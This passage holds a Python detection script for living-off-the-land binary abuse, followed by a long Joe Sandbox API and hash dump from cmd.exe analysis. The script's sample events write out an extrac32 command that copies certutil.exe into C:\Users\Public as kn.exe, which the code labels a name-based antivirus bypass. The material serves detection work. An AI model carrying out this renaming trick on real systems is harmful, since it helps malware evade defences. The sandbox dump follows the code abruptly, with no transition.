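        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes: not a command line we can reason about
        return None
    if not argv:
        return None
    tool = ntpath.basename(argv[0]).lower()
    switches = {a.lower() for a in argv[1:] if a.startswith(("/", "-"))}
    positional = [a for a in argv[1:] if not a.startswith(("/", "-"))]
    is_copy = (tool in ("extrac32", "extrac32.exe") and "/c" in switches) \
        or tool in ("expand", "expand.exe")
    if not is_copy or len(positional) < 2:
        return None
    return positional[0], positional[1]


def classify_copy(cmdline):
    """Findings for a copy of a system binary into a user-writable path (empty list if benign)."""
    parsed = parse_copy(cmdline)
    if parsed is None:
        return []
    src, dst = parsed
    src_name, dst_name = ntpath.basename(src).lower(), ntpath.basename(dst).lower()
    findings = []
    if src_name in LOLBINS and dst.lower().startswith(USER_WRITABLE):
        findings.append(f"system binary {src_name} copied to user-writable path {dst}")
        if src_name != dst_name:
            findings.append(f"copied under a different name ({src_name} -> {dst_name}): "
                            "likely name-based HIPS/AV bypass")
    return findings


def classify_renamed_image(image, original_file_name):
    """Sysmon's OriginalFileName comes from the PE version resource; a mismatch with the
    on-disk name is the tell for a renamed copy such as kn.exe."""
    on_disk = ntpath.basename(image).lower()
    if original_file_name and original_file_name.lower() != on_disk \
            and original_file_name.lower() in LOLBINS:
        return [f"{image} is a renamed {original_file_name}"]
    return []


def scan(events):
    """Run both checks over process-creation events; return [(Image, [findings...]), ...]."""
    alerts = []
    for e in events:
        findings = classify_copy(e.get("CommandLine", "")) \
            + classify_renamed_image(e.get("Image", ""), e.get("OriginalFileName", ""))
        if findings:
            alerts.append((e["Image"], findings))
    return alerts


# Constructed sample events (not from the report): the copy, the renamed binary running,
# an ordinary cmd.exe, and a legitimate cabinet extraction that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\extrac32.exe", "OriginalFileName": "extrac32.exe",
     "CommandLine": r"extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe"},
    {"Image": r"C:\Users\Public\kn.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"C:\Users\Public\kn.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c dir'},
    {"Image": r"C:\Windows\System32\extrac32.exe", "OriginalFileName": "extrac32.exe",
     "CommandLine": r"extrac32 /Y /E /L C:\Temp C:\Temp\update.cab"},
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image)
        for f in findings:
            print("   ", f)
```

The second check depends on the PE version resource, which a packed or patched copy can strip or forge, so the copy-command check is the more robust of the two; in this sample both fire, because certutil.exe is copied unmodified. Tighten USER_WRITABLE and LOLBINS to the estate being monitored before deploying.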
                                                                                          APIs
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction ID: 0503932f051479bb815cb9a7ece32915a1e1ab91501cf47de9e6529ac61de533
                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction Fuzzy Hash: 2F41BB75E0B253F6FBA48B10E9483793AE0BF51741F949036C98DC23A2CF3CA860B601
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                          • API String ID: 3625580822-2781220306
                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction ID: a79771e769768a57ffc97fdaae4fbe133e6044ca0ce2d491a3eb4a948bb38108
                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction Fuzzy Hash: C931D031A0A747B2EA149B56B5001BAB2A5BF49BD4F544130DE1D977E2EF3CE885D300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcsspn
                                                                                          • String ID:
                                                                                          • API String ID: 3809306610-0
                                                                                          • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                          • Instruction ID: 3f8feef0b43fb4f5e1626ea371939a2987a39011caa9c03b4db26c4ad407e33d
                                                                                          • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                          • Instruction Fuzzy Hash: EBB1C472E0AB47A2EB50CF15E45027977A0FB59B80F958035DA4E877A1DF7DE849E300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                          • String ID:
                                                                                          • API String ID: 3841054028-0
                                                                                          • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                          • Instruction ID: 3ff3ec679e3e0b6169ced7e2c6d54c930e011ae67546f181988a6eea8d096a05
                                                                                          • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                          • Instruction Fuzzy Hash: 77510636A0A693A1EB248B15DA001B9F6A5FF68791B558232EE5DC23E4DF3CE441E310
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93687
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936A6
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936EB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93703
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E93722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                          • String ID:
                                                                                          • API String ID: 1066134489-0
                                                                                          • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction ID: 73c792fde4408378a025d8589b62d9eb947dd8efffbc27026893511012d40255
                                                                                          • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction Fuzzy Hash: 68519E76B0A643B6EA249F31A80457AE6A1FB88BD1F084535DE1A83791DF3CE440EB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                          • String ID:
                                                                                          • API String ID: 850181435-0
                                                                                          • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                          • Instruction ID: 3581676da88748d104d0f941d65adfd7c04153bab424961cd1bb198314b1ec49
                                                                                          • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                          • Instruction Fuzzy Hash: 2D418E32609BC2DAE7708F20D8442E9B7B4FB89B45F544135DA4D8BB48CF38D549D700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E83514
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E83522
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E83541
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E8355E
                                                                                            • Part of subcall function 00007FF6A0E836EC: _get_osfhandle.MSVCRT ref: 00007FF6A0E83715
                                                                                            • Part of subcall function 00007FF6A0E836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E83770
                                                                                            • Part of subcall function 00007FF6A0E836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E83791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                          • String ID:
                                                                                          • API String ID: 4057327938-0
                                                                                          • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                          • Instruction ID: bc16f1f125c65aafe38ac7c0443590a04bc8a20042a6931825dd31292edf3e67
                                                                                          • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                          • Instruction Fuzzy Hash: 68316131F0AA43A6E7549B35A41107DBAA0FF89B91F594175EE4EC3796DE3CE808A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                          • String ID: KEYS$LIST$OFF
                                                                                          • API String ID: 411561164-4129271751
                                                                                          • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                          • Instruction ID: 6a3b02b9e64ea46636b1127b0b904e0c9717b4375da18d8aa271bd9dec88a0bf
                                                                                          • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                          • Instruction Fuzzy Hash: A8217F30A0AA07F2F7549B25A9411B5A6B5FF89790F509631D61EC73F5EF3CE844A700
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80212
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80228
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E8023C
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80251
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction ID: 17298b8667e8164354487566bbfae7d0d2ff77266ff71ca776e76e79c8056672
                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction Fuzzy Hash: 01216232D0E783A7E7905B64A588238AAA0FF4A765F144235E95ED27E1CF7CE448A700
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction ID: 9360532829a1180bc1ba1bfd298e21d861a24efe4ffdd5f5c546e1659e996bc3
                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction Fuzzy Hash: 7F118231A0AA83B6EA508B74A544078AAA0FF4A776F155334EA2F837D0DF3CD449B700
                                                                                          APIs
                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E971F9
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E9720D
                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E97300
                                                                                            • Part of subcall function 00007FF6A0E95740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6A0E975C4,?,?,00000000,00007FF6A0E96999,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E95744
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                          • String ID: _p0$wil
                                                                                          • API String ID: 455305043-1814513734
                                                                                          • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                          • Instruction ID: 174db93d645917f9da2d73515bbe03ca3a9cb3f7e7b423301da7f750d5010a6a
                                                                                          • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                          • Instruction Fuzzy Hash: D3619672B1A743A6EF25CF6594902B9A3A1FF88BC0F554532DA8E87754DF3CE5099300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                          • String ID: %s
                                                                                          • API String ID: 2401724867-3043279178
                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction ID: aa66959b98c0e2ab925dcff1ec252c9b985aa4f6ee021086a056ce9cad47ed80
                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
